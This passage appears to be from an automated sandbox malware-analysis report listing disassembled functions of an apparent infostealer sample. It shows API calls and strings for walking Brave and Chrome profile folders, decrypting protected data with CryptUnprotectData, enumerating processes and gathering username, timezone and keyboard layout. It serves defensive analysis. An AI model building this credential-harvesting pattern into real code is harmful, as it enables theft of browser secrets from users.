StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
FindClose.KERNEL32(000000FF), ref: 00411995

Strings

%s%s, xrefs: 00411838
%s\%s\%s, xrefs: 004117DB
%s\%s, xrefs: 004117FD
%s\%s, xrefs: 00411714
%s\*, xrefs: 0041165D

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 4a1a44a5959dc9b82b61be8d89ed438f48614dbf2bf761535620a69525459399
Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
Opcode Fuzzy Hash: 4a1a44a5959dc9b82b61be8d89ed438f48614dbf2bf761535620a69525459399
Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
FindClose.KERNEL32(000000FF), ref: 0040BF4D

Strings

Brave, xrefs: 0040B8A2
Preferences, xrefs: 0040B8BE
Google Chrome, xrefs: 0040BDB9
\Brave\Preferences, xrefs: 0040B97B

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 217fbc089ea81eaa224ec90d0f64b3e91da9f160fea060791b47bc177b42c4e3
Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
Opcode Fuzzy Hash: 217fbc089ea81eaa224ec90d0f64b3e91da9f160fea060791b47bc177b42c4e3
Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 6B0735A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6B0FF688,00001000), ref: 6B0735D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6B0735E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6B0735FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6B07363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6B07369F
__aulldiv.LIBCMT ref: 6B0736E4
QueryPerformanceCounter.KERNEL32(?), ref: 6B073773
EnterCriticalSection.KERNEL32(6B0FF688), ref: 6B07377E
LeaveCriticalSection.KERNEL32(6B0FF688), ref: 6B0737BD
QueryPerformanceCounter.KERNEL32(?), ref: 6B0737C4
EnterCriticalSection.KERNEL32(6B0FF688), ref: 6B0737CB
LeaveCriticalSection.KERNEL32(6B0FF688), ref: 6B073801
__aulldiv.LIBCMT ref: 6B073883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6B073902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6B073918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6B07394C

Strings

AuthcAMDenti, xrefs: 6B073946
GenuntelineI, xrefs: 6B073639
GTC, xrefs: 6B073912
QPC, xrefs: 6B0738FC
MOZ_TIMESTAMP_MODE, xrefs: 6B0735DB

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 2e9d39f5b233f195a6c9ccd7b1f0e9262c2bfad9748d505c14f9966a73cdf0c5
Instruction ID: a8a5694e552de0bf846dc5090218545dc2f3057bcd47d72368b8f9e95220d721
Opcode Fuzzy Hash: 2e9d39f5b233f195a6c9ccd7b1f0e9262c2bfad9748d505c14f9966a73cdf0c5
Instruction Fuzzy Hash: 74B17FB1B093109FDB18DF68D84571ABFEEAB8E700F05892DE999D3350EA34D801CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00412570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00412589
FindFirstFileA.KERNEL32(?,?), ref: 004125A0
StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

%s\*, xrefs: 0041257D
%s\%s, xrefs: 004125FE
%s\%s, xrefs: 0041264F

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: cfff7e71d02b1736ab1f1f7c997ebdcc83a84c1d4f68987a5e2369cfcdad3dbb
Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
Opcode Fuzzy Hash: cfff7e71d02b1736ab1f1f7c997ebdcc83a84c1d4f68987a5e2369cfcdad3dbb
Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00411B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411B9D
FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
FindClose.KERNEL32(000000FF), ref: 00411D52

Strings

%s\%s, xrefs: 00411B91

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 6a840e30490d0d08afdc1253b2c36dc6dcc5f64356898c57fcf5146ff498d072
Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
Opcode Fuzzy Hash: 6a840e30490d0d08afdc1253b2c36dc6dcc5f64356898c57fcf5146ff498d072
Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004015C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
DeleteFileA.KERNEL32(00000000), ref: 00401CB4
FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
FindClose.KERNEL32(000000FF), ref: 00401D1C

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Strings

\*.*, xrefs: 004016E1

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: f4763ada7c031ff38536aef9cb867afa4938067a9319c6e9b980bcd3ea4aaa06
Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
Opcode Fuzzy Hash: f4763ada7c031ff38536aef9cb867afa4938067a9319c6e9b980bcd3ea4aaa06
Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
FindClose.KERNEL32(000000FF), ref: 0040D500

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: b40c84206ab88950c8bc1da80f20c02468e8b1956029bad3f7442f400096f154
Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
Opcode Fuzzy Hash: b40c84206ab88950c8bc1da80f20c02468e8b1956029bad3f7442f400096f154
Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
LocalFree.KERNEL32(00000000), ref: 004146DF

Strings

/ , xrefs: 0041463C

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: f7e689532fcb6c20cb78a89c4a24d6f915bfb465a8112885e31d740b2fc4d9cf
Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
Opcode Fuzzy Hash: f7e689532fcb6c20cb78a89c4a24d6f915bfb465a8112885e31d740b2fc4d9cf
Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306

Strings

\*.*, xrefs: 0040DB7D

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: b704405470cac820e6730755b1db4dd3b53a4f97c5af91ab5e7e42f18d6cbca2
Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
Opcode Fuzzy Hash: b704405470cac820e6730755b1db4dd3b53a4f97c5af91ab5e7e42f18d6cbca2
Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 004155A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Strings

>N@, xrefs: 004155B8, 00415614, 004155BB, 00415617

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID: >N@
API String ID: 80407269-3381801619
Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415D00 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
CloseHandle.KERNEL32(0041D599), ref: 00415D7A

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,043365E8,00000000,?,0041D758,00000000,?,00000000,00000000,?,043375F0,00000000), ref: 004144C0
HeapAlloc.KERNEL32(00000000), ref: 004144C7
GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
wsprintfA.USER32 ref: 00414514

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97

Uniqueness

Uniqueness Score: -1.00%

Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
LocalFree.KERNEL32(?), ref: 004095AF

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00401177,043306D0,004136EB,0041D6E3), ref: 004143CD
HeapAlloc.KERNEL32(00000000), ref: 004143D4
GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91

Uniqueness

Uniqueness Score: -1.00%

Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
ExitProcess.KERNEL32 ref: 0040113E

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004070E0 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
lstrcat.KERNEL32(?,043337E8), ref: 004072AB
